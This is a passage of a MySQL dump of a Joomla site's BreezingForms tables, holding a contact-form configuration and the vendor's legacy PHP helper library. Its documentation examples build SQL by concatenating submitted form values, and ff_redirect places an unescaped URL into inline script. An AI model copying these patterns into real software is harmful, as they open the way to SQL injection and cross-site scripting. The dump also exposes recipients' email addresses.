,\"script2id\":\"38\",\"script2code\":\"\",\"script2flag1\":0,\"script2flag2\":0,\"script2flag3\":0,\"script2flag4\":0,\"script2flag5\":0,\"script3cond\":0,\"script3id\":0,\"script3code\":\"\",\"script3msg\":\"\",\"functionNameScript1\":\"\",\"functionNameScript2\":\"\",\"functionNameScript3\":\"\",\"flag1\":0,\"flag2\":0,\"mailback\":0,\"mailbackfile\":\"\",\"title\":\"bfFakeTitle4\",\"name\":\"bfFakeName4\",\"page\":1,\"orderNumber\":0,\"dbId\":124,\"appElementOrderId\":0,\"id\":0,\"logging\":0,\"qId\":0,\"internalType\":\"\"}],\"elementCount\":6}]',1,1,0,'Contactnew','Smith & Smith Enquiry','','Contactnew','','','',400,0,500,0,2,2,1,1,1,0,0,1,0,'<p>The following enquiry was received from your website. {NAME:label} : {NAME:value} {CONTACTNUMBER:label} : {CONTACTNUMBER:value} {EMAIL:label} : {EMAIL:value} {DEPARTMENT:label} : {DEPARTMENT:value} {COMMENT:label} : {COMMENT:value}</p>','',1,1,'shirley@smithandsmith.co.za;bevan@webspring.co.za',1,0,31,'',2,32,'function ff_Contactnew_submitted(status, message){if(status==0){ff_switchpage(2);}else{alert(message);}}',0,1,'',0,NULL,'',0,5,'',2,NULL,'JFactory::getApplication()->redirect(\'/thankyou\');',2,NULL,'',0,'',NULL);
/*!40000 ALTER TABLE `vzx9b_facileforms_forms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_integrator_criteria_fixed`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_integrator_criteria_fixed`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_integrator_criteria_fixed` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`rule_id` int(11) NOT NULL,
`reference_column` varchar(255) NOT NULL,
`operator` varchar(255) NOT NULL,
`fixed_value` text NOT NULL,
`andor` varchar(3) NOT NULL DEFAULT 'AND',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_integrator_criteria_fixed`
--
LOCK TABLES `vzx9b_facileforms_integrator_criteria_fixed` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_integrator_criteria_fixed` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_facileforms_integrator_criteria_fixed` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_integrator_criteria_form`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_integrator_criteria_form`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_integrator_criteria_form` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`rule_id` int(11) NOT NULL,
`reference_column` varchar(255) NOT NULL,
`operator` varchar(255) NOT NULL,
`element_id` varchar(255) NOT NULL,
`andor` varchar(3) NOT NULL DEFAULT 'AND',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_integrator_criteria_form`
--
LOCK TABLES `vzx9b_facileforms_integrator_criteria_form` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_integrator_criteria_form` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_facileforms_integrator_criteria_form` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_integrator_criteria_joomla`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_integrator_criteria_joomla`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_integrator_criteria_joomla` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`rule_id` int(11) NOT NULL,
`reference_column` varchar(255) NOT NULL,
`operator` varchar(255) NOT NULL,
`joomla_object` varchar(255) NOT NULL,
`andor` varchar(3) NOT NULL DEFAULT 'AND',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_integrator_criteria_joomla`
--
LOCK TABLES `vzx9b_facileforms_integrator_criteria_joomla` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_integrator_criteria_joomla` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_facileforms_integrator_criteria_joomla` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_integrator_items`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_integrator_items`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_integrator_items` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`rule_id` int(11) NOT NULL,
`element_id` int(11) NOT NULL,
`reference_column` varchar(255) NOT NULL,
`code` text NOT NULL,
`published` tinyint(4) NOT NULL DEFAULT 1,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_integrator_items`
--
LOCK TABLES `vzx9b_facileforms_integrator_items` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_integrator_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_facileforms_integrator_items` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_integrator_rules`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_integrator_rules`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_integrator_rules` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL,
`form_id` int(11) NOT NULL,
`reference_table` varchar(255) NOT NULL,
`type` varchar(255) NOT NULL DEFAULT 'insert',
`published` tinyint(1) NOT NULL DEFAULT 1,
`finalize_code` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_integrator_rules`
--
LOCK TABLES `vzx9b_facileforms_integrator_rules` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_integrator_rules` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_facileforms_integrator_rules` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_packages`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_packages`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_packages` (
`id` varchar(30) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`version` varchar(30) NOT NULL DEFAULT '',
`created` varchar(20) NOT NULL DEFAULT '',
`title` varchar(50) NOT NULL DEFAULT '',
`author` varchar(50) NOT NULL DEFAULT '',
`email` varchar(50) NOT NULL DEFAULT '',
`url` varchar(50) NOT NULL DEFAULT '',
`description` varchar(100) NOT NULL DEFAULT '',
`copyright` varchar(100) NOT NULL DEFAULT '',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_packages`
--
LOCK TABLES `vzx9b_facileforms_packages` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_packages` DISABLE KEYS */;
INSERT INTO `vzx9b_facileforms_packages` VALUES ('','mypck_001','0.0.1','2005-07-31 22:21:23','My First Package','My Name','my.name@my.domain','http://www.my.domain','This is the first package that I created','This FacileForms package is released under the GNU/GPL license'),('FF','stdlib.english','1.8','2012-09-21 11:50:15','BreezingForms-Standard Piece and Script Libraries','Markus Bopp','markus.bopp@crosstec.org','http://www.crosstec.org','These are the standard BreezingForms script and piece libraries.','This BreezingForms package is released under the GNU/GPL license');
/*!40000 ALTER TABLE `vzx9b_facileforms_packages` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_facileforms_pieces`
--
DROP TABLE IF EXISTS `vzx9b_facileforms_pieces`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_facileforms_pieces` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`published` tinyint(1) NOT NULL DEFAULT 0,
`package` varchar(30) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL DEFAULT '',
`description` text DEFAULT NULL,
`type` varchar(30) NOT NULL DEFAULT '',
`code` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=29 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_facileforms_pieces`
--
LOCK TABLES `vzx9b_facileforms_pieces` WRITE;
/*!40000 ALTER TABLE `vzx9b_facileforms_pieces` DISABLE KEYS */;
INSERT INTO `vzx9b_facileforms_pieces` VALUES (1,1,'FF','ff_addCustomCSSFile','Add custom CSS File','Adds a custom css file to the form. To choose a css file, execute this piece and call the function ff_addCustomCSSFile(\'path/to/css/file\') with the RELATIVE (not full!) path to your joomla installation.\r\nDo not forget to call $this->execPieceByName(\'ff_InitLib\') before!\r\n\r\nExample:\r\n\r\nglobal $mainframe;\r\n\r\n$this->execPieceByName(\'ff_InitLib\');\r\n$this->execPieceByName(\'ff_addCustomCSSFile\');\r\n\r\nff_addCustomCSSFile(\'templates/\' . $mainframe->getTemplate() . \'/css/template.css\');','Before Form','function ff_addCustomCSSFile($path){\r\n if(file_exists(JPATH_SITE . \'/\' . $path)){\r\n JFactory::getDocument()->addStyleSheet(JURI::root() . $path);\r\n }\r\n}'),(2,1,'FF','ff_Constants','Constansts definitions','Library constants definitions','Before Form','define(\'FF_DIE\', \'_ff_die_on_errors_\');\r\ndefine(\'FF_DONTDIE\', \'_ff_stay_alive_\');\r\ndefine(\'FF_IGNOREDIE\', \'_ff_ignore_if_dying_\');\r\n\r\ndefine(\'FF_ARRAY\', \'_ff_return_as_array_\');\r\ndefine(\'FF_LIST\', \'_ff_return_as_list_\');\r\ndefine(\'FF_SLIST\', \'_ff_return_as_slist_\');\r\ndefine(\'FF_DLIST\', \'_ff_return_as_dlist_\');\r\n\r\ndefine(\'FF_NOTRIM\', 1);\r\ndefine(\'FF_ALLOWHTML\', 2);\r\ndefine(\'FF_ALLOWRAW\', 4);'),(3,1,'FF','ff_die','Terminate form gracefully','Gracefully terminates the form and shows a message plus opionally a \r\nCONTINUE button for further redirection.\r\n\r\nCall:\r\n\r\n ff_die($message=null, $action=\'stop\', $target=\'\', $params=\'\', $label=\'Continue\');\r\n return;\r\n\r\n $message = A message to display. If no message is provided, it will\r\n display:\r\n\r\n Fatal error in $formname, processing stopped.\r\n\r\n $action = \'stop\' : Dont show a CONTINUE button (default)\r\n \'self\' : Redirect to the same form\r\n \'form\' : Redirect to another form \r\n \'page\' : Redirect to another page of this site\r\n \'home\' : Redirect to homepage of the site\r\n \'url\' : Redirect to a url\r\n\r\n $target = Target name/url for \'form\', \'page\' and \'url\'\r\n\r\n $params = Additional parameters for \'self\' and \'form\'\r\n\r\n $label = Text for the continue button\r\n\r\nExamples:\r\n\r\n // Display standard message without continue button\r\n ff_die(); \r\n\r\n // Display message without continue button\r\n ff_die(\'Sorry, cannot continue for some reason.\');\r\n\r\n // Display standard message and return to same form with a parameter\r\n ff_die(null, \'self\', \'&ff_param_foo=bar\');\r\n\r\n // Redirect to another form\r\n ff_die(\'Guess you are hungry now...\', \'form\', \'SamplePizzaShop\', null, \'Order\');\r\n\r\n // Redirect to another site page\r\n ff_die(\r\n \'Something strange has happened!\', \r\n \'page\', \r\n \'index.php?option=com_content&task=section&id=1&Itemid=2\'\r\n );','Untyped','function ff_die($message=\'\', $action=\'stop\', $target=\'\', $params=\'\', $label=\'Continue\')\r\n{\r\n global $ff_processor;\r\n if ($ff_processor->dying) return;\r\n\r\n ob_end_clean();\r\n $form =& $ff_processor->formrow;\r\n if (!$message) \r\n $message = \r\n \"<strong>Fatal error in $form->name, form processing halted.</strong>\";\r\n switch ($action) {\r\n case \'self\': $url = ff_makeSelfUrl($params); break;\r\n case \'form\': $url = ff_makeFormUrl($target, $params); break;\r\n case \'page\': $url = ff_makePageUrl($target); break;\r\n case \'home\': $url = \"{mossite}\"; break;\r\n case \'url\' : $url = $target; break;\r\n default : $url = \'\';\r\n } // switch\r\n if ($form->class1 != \'\') echo \'<div class=\"\'.$form->class1.\'\">\'.nl();\r\n echo($message.\'<br/><br/><br/>\'.nl());\r\n if ($url) {\r\n if (!$ff_processor->inline) echo \'<form action=\"#redirect\">\'.nl();\r\n if ($ff_processor->inframe) $t = \'parent\'; else $t = \'document\';\r\n echo \'<input type=\"button\" class=\"button\" value=\"\'.$label.\'\"\'.\r\n \' onClick=\"\'.$t.\'.location.href=\\\'\'.htmlentities($url,ENT_QUOTES).\'\\\';\"\'.\r\n \'/>\'.nl();\r\n if (!$ff_processor->inline) echo \'</form>\'.nl();\r\n } // if\r\n if ($form->class1 != \'\') echo \'</div>\'.nl();\r\n unset($form);\r\n ob_start();\r\n $ff_processor->suicide();\r\n} // ff_die'),(4,1,'FF','ff_DisableFormTrace','Disable tracing at view time','Disables tracing for use as before form piece','Before Form','//+trace dis'),(5,1,'FF','ff_DisableSubmitTrace','Disable tracing at submit time','Disables tracing for use as begin submit piece','Begin Submit','//+trace dis'),(6,1,'FF','ff_dying','Query live status','Query if form is dying','Untyped','//+trace max none\r\nfunction ff_dying()\r\n{\r\n global $ff_processor; \r\n return $ff_processor->dying;\r\n} // ff_dying'),(7,1,'FF','ff_expString','String export','Export string function: escapes special characters in c-codes','Untyped','function ff_expString($text)\r\n{\r\n return expstring($text);\r\n} // ff_expString'),(8,1,'FF','ff_getPageByNameX','Get page # by element name','Gets the page number by the name of an element. \r\nTypically used to redirect to a certain page in a before form piece \r\nas \r\n\r\n $this->page = ff_getPageByName(\'elementname\');','Untyped','function ff_getPageByName($name)\r\n{\r\n global $ff_processor;\r\n foreach($ff_processor->rows as $row)\r\n if ($row->name==$name)\r\n return $row->page;\r\n return null;\r\n} // ff_getPageByName'),(9,1,'FF','ff_getParam','Get GET/POST parameter','Direct replacement for mosGetParam. ff_getParam will attempt to filter \r\nout parameters that are targeted to another form on the same page.','Untyped','function ff_getParam($name, $default=null, $mask=0)\r\n{\r\n global $ff_request;\r\n if (substr($name,0,9)==\'ff_param_\') {\r\n if (!isset($ff_request[$name])) return $default;\r\n $val = $ff_request[$name];\r\n } else {\r\n if (!isset($_REQUEST[$name])) return $default;\r\n $val = $_REQUEST[$name];\r\n } // if\r\n $dotrim = ($mask & FF_NOTRIM)==0;\r\n $dostrp = ($mask & FF_ALLOWHTML)==0;\r\n $addsla = ($mask & FF_ALLOWRAW)==0 && !get_magic_quotes_gpc();\r\n $remsla = ($mask & FF_ALLOWRAW)!=0 && get_magic_quotes_gpc();\r\n if (is_array($val)) {\r\n $cnt = count($val);\r\n for ($v = 0; $v < $cnt; $v++)\r\n if (is_string($val[$v])) {\r\n if ($dotrim) $val[$v] = trim($val[$v]);\r\n if ($dostrp) $val[$v] = strip_tags($val[$v]);\r\n if ($addsla) $val[$v] = addslashes($val[$v]);\r\n if ($remsla) $val[$v] = stripslashes($val[$v]);\r\n } // if\r\n } else {\r\n if (is_string($val)) {\r\n if ($dotrim) $val = trim($val);\r\n if ($dostrp) $val = strip_tags($val);\r\n if ($addsla) $val = addslashes($val);\r\n if ($remsla) $val = stripslashes($val);\r\n } // if\r\n } // if\r\n return $val;\r\n} // ff_getParam'),(10,1,'FF','ff_getSubmit','Get submited data','Returns submitdata either as scalar, array or list. In case of list the values\r\nare returned as a string with the values concatenated by comma.\r\n\r\nExamples:\r\n\r\n// Get as scalar: Optionally pass a default value as second parameter.\r\n// If no default is provided, it will return NULL if no value was submitted\r\n\r\n $myval = ff_getSubmit(\'myvar\'); // return NULL if not submitted\r\n\r\n $myval = ff_getSubmit(\'myvar\',1); // return 1 if not submitted\r\n\r\n $myval = ff_getSubmit(\'myvar\',\'foo\'); // return \'foo\' if not submitted\r\n\r\n ff_query(\r\n \"insert into #__mytable(id, name) \".\r\n \"values (\'\".\r\n ff_getSubmit(\'id\').\", \".\r\n ff_getSubmit(\'name\',\'unknown\').\r\n \"\')\"\r\n );\r\n\r\n// Get as array: Pass FF_ARRAY as second Parameter\r\n\r\n $myarr = $ff_getSubmit(\'myarr\', FF_ARRAY);\r\n\r\n foreach ($myarr as $myval) ...\r\n\r\n// Get as list: Pass either FF_LIST, FF_SLIST or FF_DLIST as 2nd parameter.\r\n\r\n // FF_LIST will return numeric data unquoted and strings in single quotes:\r\n // 1,2,\'a\',4\r\n\r\n // FF_SLIST will return all data single quoted:\r\n // \'1\',\'2\',\'a\',\'4\'\r\n\r\n // FF_DLIST will return all data double quoted:\r\n // \"1\",\"2\",\"a\",\"4\"\r\n\r\n ff_query(\r\n \"delete from #__mytable \".\r\n \"where id in (\".ff_getSubmit(\'itemlist\',FF_LIST).\")\"\r\n );','Untyped','function ff_getSubmit($name, $default=null)\r\n{\r\n global $ff_processor;\r\n\r\n switch ((string)$default) {\r\n case FF_ARRAY: $value = array(); break;\r\n case FF_LIST : \r\n case FF_SLIST:\r\n case FF_DLIST: $value = \'\'; break;\r\n default : $value = $default;\r\n } // switch\r\n foreach ($ff_processor->submitdata as $data)\r\n if ($data[_FF_DATA_NAME]==$name) {\r\n $q = \'\';\r\n switch ((string)$default) {\r\n case FF_ARRAY:\r\n $value[] = $data[_FF_DATA_VALUE];\r\n break;\r\n case FF_SLIST:\r\n $q = \"\'\";\r\n case FF_DLIST:\r\n if ($q==\'\') $q = \'\"\';\r\n case FF_LIST:\r\n if ($q==\'\' && !is_numeric($data[_FF_DATA_VALUE])) $q = \"\'\";\r\n if ($value!=\'\') $value.=\',\';\r\n $value .= $q.$data[_FF_DATA_VALUE].$q;\r\n break;\r\n default:\r\n return $data[_FF_DATA_VALUE];\r\n } // switch\r\n } // if\r\n return $value;\r\n} // ff_getSubmit'),(11,1,'FF','ff_impString','String import','Import string function: unescapes c-coded characters of a string','Untyped','function ff_impString($text)\r\n{\r\n return impstring($text);\r\n} // ff_impString'),(12,1,'FF','ff_InitLib','Init Library','A collection of useful functions for use in form pieces. \r\n\r\nInclude by: \r\n\r\n $this->execPieceByName(\'ff_InitLib\');','Before Form','//+trace high none\r\nif (!defined(\'FF_DIE\')) $this->execPieceByName(\'ff_Constants\');\r\nif (!function_exists(\'ff_expstring\')) $this->execPieceByName(\'ff_expstring\');\r\nif (!function_exists(\'ff_makePageUrl\')) $this->execPieceByName(\'ff_makePageUrl\');\r\nif (!function_exists(\'ff_makeFormUrl\')) $this->execPieceByName(\'ff_makeFormUrl\');\r\nif (!function_exists(\'ff_makeSelfUrl\')) $this->execPieceByName(\'ff_makeSelfUrl\');\r\nif (!function_exists(\'ff_die\')) $this->execPieceByName(\'ff_die\');\r\nif (!function_exists(\'ff_dying\')) $this->execPieceByName(\'ff_dying\');\r\nif (!function_exists(\'ff_redirect\')) $this->execPieceByName(\'ff_redirect\');\r\nif (!function_exists(\'ff_redirectParent\')) $this->execPieceByName(\'ff_redirectParentX\');\r\nif (!function_exists(\'ff_redirectPage\')) $this->execPieceByName(\'ff_redirectPage\');\r\nif (!function_exists(\'ff_redirectForm\')) $this->execPieceByName(\'ff_redirectForm\');\r\nif (!function_exists(\'ff_redirectSelf\')) $this->execPieceByName(\'ff_redirectSelf\');\r\nif (!function_exists(\'ff_setChecked\')) $this->execPieceByName(\'ff_setCheckedX\');\r\nif (!function_exists(\'ff_setSelected\')) $this->execPieceByName(\'ff_setSelectedX\');\r\nif (!function_exists(\'ff_setValue\')) $this->execPieceByName(\'ff_setValueX\');\r\nif (!function_exists(\'ff_getPageByName\')) $this->execPieceByName(\'ff_getPageByNameX\');\r\nif (!function_exists(\'ff_getParam\')) $this->execPieceByName(\'ff_getParam\');\r\nif (!function_exists(\'ff_getSubmit\')) $this->execPieceByName(\'ff_getSubmit\');\r\nif (!function_exists(\'ff_impString\')) $this->execPieceByName(\'ff_impString\');\r\nif (!function_exists(\'ff_expString\')) $this->execPieceByName(\'ff_expString\');\r\nif (!function_exists(\'ff_securityImage\')) $this->execPieceByName(\'ff_securityImage\');\r\nif (!function_exists(\'ff_select\')) $this->execPieceByName(\'ff_select\');\r\nif (!function_exists(\'ff_selectValue\')) $this->execPieceByName(\'ff_selectValue\');\r\nif (!function_exists(\'ff_query\')) $this->execPieceByName(\'ff_query\');\r\nif (!function_exists(\'ff_markdown\')) $this->execPieceByName(\'ff_markdown\');'),(13,1,'FF','ff_makeFormUrl','Make URL to other form','Redirects to another facile form. \r\n\r\nCall: \r\n\r\n $url = ff_makeFormUrl($name, $params = \'\');\r\n\r\nExample:\r\n\r\n $url = ff_makeFormUrl(\r\n \'OtherForm\', \r\n \'&ff_param_email=\'.urlencode($email)\r\n );','Untyped','function ff_makeFormUrl($name, $params=\'\')\r\n{\r\n global $ff_processor, $ff_otherparams;\r\n $url = \'\';\r\n switch ($ff_processor->runmode) {\r\n case 2: // preview\r\n case 1: // backend\r\n $url .= \'administrator/index2.php?option=com_breezingforms&act=run\'.\r\n \'&ff_name=\'.urlencode($name);\r\n if ($ff_processor->inframe) $url .= \'&ff_frame=1\';\r\n if ($ff_processor->border) $url .= \'&ff_border=1\';\r\n break;\r\n default: // frontend\r\n $url .= \'index.php?ff_name=\'.urlencode($name);\r\n if ($ff_otherparams[\'option\'] == \'com_breezingforms\') {\r\n reset($ff_otherparams);\r\n while (list($prop, $val) = each($ff_otherparams))\r\n $url .= \'&\'.urlencode($prop).\'=\'.urlencode($val);\r\n } else\r\n $url .= \'&option=com_breezingforms\';\r\n if ($ff_processor->target > 1) $url .= \'&ff_target=\'.$ff_processor->target;\r\n if ($ff_processor->inframe) $url .= \'&ff_frame=1\';\r\n if ($ff_processor->border) $url .= \'&ff_border=1\';\r\n if ($ff_processor->align !=1) $url .= \'&ff_align=\'.$ff_processor->align;\r\n if ($ff_processor->top>0) $url .= \'&ff_top=\'.$ff_processor->top;\r\n } // switch\r\n return ff_makePageUrl($url. $params);\r\n} // ff_makeFormUrl'),(14,1,'FF','ff_makePageUrl','Make URL to other page','Builds an URL to another mambo page\r\n\r\nCall: \r\n\r\n $url = ff_makePageUrl($params = \'\');\r\n\r\nExample:\r\n\r\n $url = ff_makePageUrl(\r\n \'index.php?option=com_content&task=blogsection&id=0&Itemid=39\'\r\n );','Untyped','function ff_makePageUrl($params=\'\')\r\n{\r\n $url = \'{mossite}\';\r\n if ($params != \'\') {\r\n $len = strlen($url);\r\n if ($len > 0 && $url{$len-1} != \'/\') $url .= \'/\';\r\n $url .= $params;\r\n } // if\r\n return $url;\r\n} // ff_makePageUrl'),(15,1,'FF','ff_makeSelfUrl','Make URL to same form','Make an URL to the same form. \r\n\r\nCall: \r\n\r\n $url = ff_makeSelfUrl($params = \'\');\r\n\r\nExample:\r\n\r\n $url = ff_makeSelfUrl(\'&ff_param_email=\'.urlencode($email));','Untyped','function ff_makeSelfUrl($params=\'\')\r\n{\r\n global $ff_processor;\r\n return ff_makeFormUrl($ff_processor->formrow->name, $params);\r\n} // ff_makeSelfUrl'),(16,1,'FF','ff_query','Non-select queries against db','Execute a simple db query.\r\n\r\nInclude by one of:\r\n\r\n $this->execPieceByName(\'ff_InitUtilities\');\r\n $this->execPieceByName(\'ff_SubmitUtilities\');\r\n if (!function_exists(\'ff_query\')) $this->execPieceByName(\'ff_query\');\r\n\r\nCall syntax:\r\n\r\n [$newid = ] ff_query($sql [, $insert = 0]);\r\n\r\n $sql: Sql statement to call\r\n $insert: 1 = return key of auto column when inserting rows\r\n $newid: The key of the new row.','Untyped','function ff_query($sql, $insert=false, $error=FF_DIE)\r\n{\r\n global $ff_processor;\r\n $database = JFactory::getDBO();\r\n if ($ff_processor->dying && $error!=FF_IGNOREDIE) return -1;\r\n $database->setQuery($sql);\r\n $database->query();\r\n if ($database->getErrorNum()) {\r\n $dienow = $error==FF_DIE;\r\n $error = $database->stderr();\r\n if ($dienow) ff_die($error);\r\n } else {\r\n $error = null;\r\n if ($insert) return $database->insertid();\r\n } // if\r\n return 0;\r\n} // ff_query'),(17,1,'FF','ff_redirect','Basic redirection','Basic redirection routine supporting multiple targets and methods.\r\n\r\nCall:\r\n \r\nff_redirect($url [, $target=\'self\' , $method=\'post\'])\r\n\r\n $url = The url to redirect to including the parameters appended.\r\n\r\n $target = \'top\', \'parent\', \'self\' or \'blank\'\r\n\r\n \'top\' = redirect to the top browser window\r\n \'parent\' = redirect to the parent frame\r\n \'self\' = redirect in the same frame (the default)\r\n \'blank\' = redirect to a new browser window \r\n (blank works with post method only)\r\n\r\n $method = \'post\' or \'get\'. The default is \'post\'.\r\n\r\n Example:\r\n\r\n ff_redirect(\r\n \'http://mysite.net/index.php?option=xxx&Itemid=33\',\r\n \'top\'\r\n );','Untyped','function ff_redirect($url, $target=\'self\', $method=\'post\')\r\n{\r\n global $ff_processor, $ff_request;\r\n if ($ff_processor->dying) return;\r\n\r\n ob_end_clean();\r\n switch (strtolower($method)) {\r\n case \'get\': {\r\n switch (strtolower($target)) {\r\n case \'top\' :\r\n case \'parent\': break;\r\n default : $target = \'document\';\r\n } // switch\r\n echo \'<script type=\"text/javascript\">\'.nl().\r\n \'<!--\'.nl().\r\n \"onload=function() { \".$target.\".location.href=\'\".$url.\"\'; }\".nl().\r\n \'-->\'.nl().\r\n \'</script>\'.nl().\r\n \'</body>\'.nl();\r\n break;\r\n } // url\r\n default: { // post\r\n $pos = strpos($url,\'?\');\r\n $ff_request = array();\r\n if ($pos === false)\r\n $action = $url;\r\n else {\r\n $action = substr($url,0,$pos);\r\n addRequestParams(substr($url, $pos+1));\r\n } // if\r\n switch (strtolower($target)) {\r\n case \'blank\' : $target = \' target=\"_blank\"\'; break;\r\n case \'top\' : $target = \' target=\"_top\"\'; break;\r\n case \'parent\': $target = \' target=\"_parent\"\'; break;\r\n default : $target = \' target=\"_self\"\';\r\n } // switch\r\n echo \'<script language=\"javascript\" type=\"text/javascript\">\'.nl().\r\n \'<!--\'.nl().\r\n \'onload = function() { document.ff_redirect.submit(); }\'.nl().\r\n \'-->\'.nl().\r\n \'</script>\'.nl().\r\n \'<form action=\"\'.$action.\'\" \'.\r\n \'method=\"post\" \'.\r\n \'name=\"ff_redirect\" id=\"ff_redirect\" \'.\r\n \'enctype=\"multipart/form-data\"\'.\r\n $target.\r\n \'>\'.nl();\r\n while (list($prop, $val) = each($ff_request))\r\n echo \'<input type=\"hidden\" name=\"\'.$prop.\'\" \'.\r\n \'value=\"\'.htmlentities(urldecode($val)).\'\"/>\'.nl();\r\n echo \'</form>\'.nl().\r\n \'</body>\'.nl();\r\n } // post\r\n } // switch\r\n exit;\r\n} // ff_redirect'),(18,1,'FF','ff_redirectForm','Redirect to other form','Redirects to another facile form. \r\n\r\nCall: \r\n\r\n ff_redirectForm($name, $params = \'\');\r\n\r\nExample:\r\n\r\n ff_redirectForm(\r\n $this, \r\n \'SecondForm\', \r\n \'&ff_param_email=\'.urlencode($email)\r\n );','Untyped','function ff_redirectForm($name, $params=\'\', $method=\'post\')\r\n{\r\n ff_redirectParent(ff_makeFormUrl($name, $params), $method);\r\n} // ff_redirectForm'),(19,1,'FF','ff_redirectPage','Redirect to other page','Redirects to another mambo page. \r\n\r\nCall: \r\n\r\n ff_redirectPage($params = \'\');\r\n\r\nExample:\r\n\r\n ff_redirectPage(\r\n \'index.php?option=com_content&task=blogsection&id=0&Itemid=39\'\r\n );','Untyped','function ff_redirectPage($params=\'\', $method=\'post\')\r\n{\r\n ff_redirectParent(ff_makePageUrl($params), $method);\r\n} // ff_redirectPage'),(20,1,'FF','ff_redirectParentX','Redirect to parent window','Redirects to the parent window when runing in iframe, otherwise to self. \r\n\r\nff_redirectParent($url [, $method=\'post\'])\r\n\r\n $url = The url to redirect to including the parameters appended.\r\n\r\n $method = \'post\' or \'url\'. The default is \'post\'.\r\n\r\n Example:\r\n\r\n ff_redirectParent(\r\n \'http://mysite.net/index.php?option=xxx&Itemid=33\',\r\n \'url\'\r\n );','Untyped','function ff_redirectParent($url, $method = \'post\')\r\n{\r\n global $ff_processor;\r\n if ($ff_processor->inframe) $target = \'parent\'; else $target = \'self\'; \r\n ff_redirect($url, $target, $method);\r\n} // ff_redirectParent'),(21,1,'FF','ff_redirectSelf','Redirect to same form','Redirects to the same form. \r\n\r\nCall: \r\n\r\n ff_redirectSelf($params = \'\');\r\n\r\nExample:\r\n\r\n ff_redirectSelf(\'&ff_param_email=\'.urlencode($email));','Untyped','function ff_redirectSelf($params=\'\', $method=\'post\')\r\n{\r\n ff_redirectParent(ff_makeSelfUrl($params), $method);\r\n} // ff_redirectSelf'),(22,1,'FF','ff_securityImage','Security Image','Create code to display the security image','Untyped','global $ff_seccode;\r\n\r\nif (!isset($this->record_id)) { $ff_seccode = null; }\r\n\r\nfunction ff_securityImage()\r\n{\r\n global $ff_comsite, $ff_seccode;\r\n if (!isset($ff_seccode)) { 